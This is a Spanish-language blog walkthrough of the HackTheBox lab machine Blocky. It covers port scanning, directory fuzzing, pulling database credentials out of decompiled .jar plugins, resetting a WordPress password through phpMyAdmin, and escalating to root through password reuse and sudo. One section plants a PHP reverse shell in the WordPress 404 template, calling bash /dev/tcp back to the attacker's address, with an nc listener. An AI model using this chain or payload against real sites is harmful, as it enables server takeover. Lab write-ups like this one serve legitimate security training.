lund@home:~$

Autor: Lund K. S.

HTB_Blocky HTB_Blocky | Hacker-Blog

HTB_Blocky

Blocky {-}

Introduccion {-}

La maquina del dia 30/07/2021 se llama Blocky .

El replay del live se puede ver aqui

S4vitaar Blocky maquina

No olvideis dejar un like al video y un comentario…

Enumeracion {-}

Reconocimiento de maquina, puertos abiertos y servicios {-}

Ping {-}

ping -c 1 10.10.10.37

ttl: 63 -> maquina linux. Recuerda que en cuanto a ttl se trata, 64 = linux y 128 = windows. Pero como estamos en hackthebox hay un nodo intermediario que hace que el ttl disminuya una unidad

Nmap {-}

nmap -p- --open -T5 -v -n 10.10.10.37 

si consideras que va muy lento el escaneo puedes poner los siguientes parametros para que valla mucho mas rapido

nmap -sS -p- --open --min-rate 5000 -vvv -n -Pn 10.10.10.37 -oG allPorts 
extractPorts allPorts
nmap -sC -sV -p21,22,80,25565 10.10.10.37 -oN targeted
Puerto Servicio Que se nos occure? Que falta?
21 ftp conectar como anonymous  
22 ssh conexion directa usuario y contraseña
80 http Analisis de la web y Fuzzing  
25565 minecraft con el puerto 53 pensamos en virt hosting  

Conectar al ftp como anonymous {-}

ftp 10.10.10.37
Name: anonymous
password: <enter>
#Output
530 Login incorrect.

No nos deja entrar como anonymous

Analizando la web {-}

Whatweb {-}

whatweb http://10.10.10.37

Aqui vemos que estamos en un Wordpress

http-enum {-}

Lanzamos un web scan con nmap.

nmap --script http-enum -p80 10.10.10.37 -oN webScan

Ya nos detecta un /phpmyadmin/ y ficheros de wordpress

Chequear la web del puerto 80 {-}

Con firefox navegamos en la web para ver lo que es.

  • wappalizer nos dice que es Wordpress
  • Vemos que la web esta under construction
  • Si pinchamos el post vemos que es el usuario NOTCH que lo a echo

Como es un wordpress intentamos ir al http://10.10.10.37/wp-login.php y miramos si hay el usuario NOTCH. Efectivamente el usuario NOTCH existe.

Vamos a por el http://10.10.10.37/phpmyadmin/ y buscamos previamente en google si encontramos credenciales por defecto pero no funcionan.

Tenemos que ir buscando mas rutas.

Fuzzing con WFuzz {-}

wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.37/WFUZZ

Encontramos un ruta plugins que no suele ser normal porque en wordpress los plugins suelen estar en /wp-content/plugins y no en /plugins directamente

Aqui encontramos dos ficheros .jar. Los descargamos en nuestra maquina de atacante.

Evaluacion de vulnerabilidades {-}

Analizamos los ficheros {-}

Los ficheros .jar son ficheros comprimidos que se pueden descomprimir con la herramienta unzip

unzip BlockyCore.jar
unzip griefprevention-1.11.2-3.1.1.298.jar

Ya tenemos ficheros .class que podemos analizar con strings o mejor con javap

javap -c Blockycore.class

Aqui ya podemos ver cosas como un usuario root y una contraseña para un sqlUser.

Aqui vamos a la url http://10.10.10.37/phpmyadmin/ y probamos. Ya podemos entrar en el panel de configuracion de la base de datos.

Vemos la base de datos de wordpress y le cambiamos la contraseña al usuario NOTCH. Lo unico seria seleccionnar la Funcion MD5 al lado de la contraseña.

hmyadmi-otch Intentamos conectar al wordpress con el usuario NOTCH y su nueva contraseña y pa dentro.

Editar el 404 Template de Wordpress {-}

Cada vez que se puede entrar en el panel de administracion de wordpress siempre hacemos lo mismo.

Pinchamos en Appearance > Editor y retocamos el fichero 404 Template.

[ ! ] Nota: Si este fichero no existe, justo encima, se puede Select theme to edit y buscar otro tema.

Explotacion de vulnerabilidad & Ganando Acceso {-}

Crear una reverse shell desde la 404 Template {-}

Nos ponemos en escucha con el puerto 443.

nc -nlvp 443

Editamos el fichero 404 Template con una reverse shell en php

<?php
    system("bash -c 'bash -i >& /dev/tcp/10.10.14.7/443 0>&1'");
?>

ya podemos ir al url http://10.10.10.37/?p=404.php y pa dentro

Tratamiento de la TTY {-}

script /dev/null -c bash
^Z
stty raw -echo; fg
-> reset
-> xterm
export TERM=xterm
export SHELL=bash

stty -a

stty rows <rownb> columns <colnb>

User Pivoting al usuario notch {-}

Miramos si hay reutilisacion de contraseñas

su notch 

Y con la contraseña encontrada en el ficher BlockyCore.class funciona. Y ya podemos ver la flag.## Escalada de privilegios {-}

Rootear la maquina {-}

sudo -l
#Output
(ALL : ALL) ALL

Vemos que el usuario notch puede efectuar cualquier comando como qualquier usuario ;)

sudo su
whoami

root

Ya esta ;)